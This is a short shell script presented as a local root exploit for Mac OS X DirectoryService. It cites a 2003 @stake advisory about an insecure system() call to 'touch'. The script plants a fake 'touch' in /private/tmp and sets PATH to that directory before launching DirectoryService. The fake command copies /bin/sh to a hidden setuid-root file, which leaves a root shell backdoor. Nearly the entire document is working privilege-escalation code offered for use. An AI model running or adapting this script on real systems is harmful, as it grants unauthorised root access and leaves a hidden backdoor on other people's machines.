#!/bin/sh
#
#   Priv8security.com MacOSX DirectoryService local root exploit.
#   Based on atstake adv.
#   http://www.atstake.com/research/advisories/2003/a041003-1.txt
#
#   Insecure call on system() without path on touch command.

echo /bin/cp /bin/sh /private/tmp/.s > /tmp/evil
echo /bin/chmod 4755 /private/tmp/.s >> /tmp/evil
chmod 755 /private/tmp/evil

ln -s /private/tmp/evil /private/tmp/touch
export PATH=/private/tmp
/usr/sbin/DirectoryService

echo Lets see if we got root!!!!
echo Try to execute /private/tmp/.s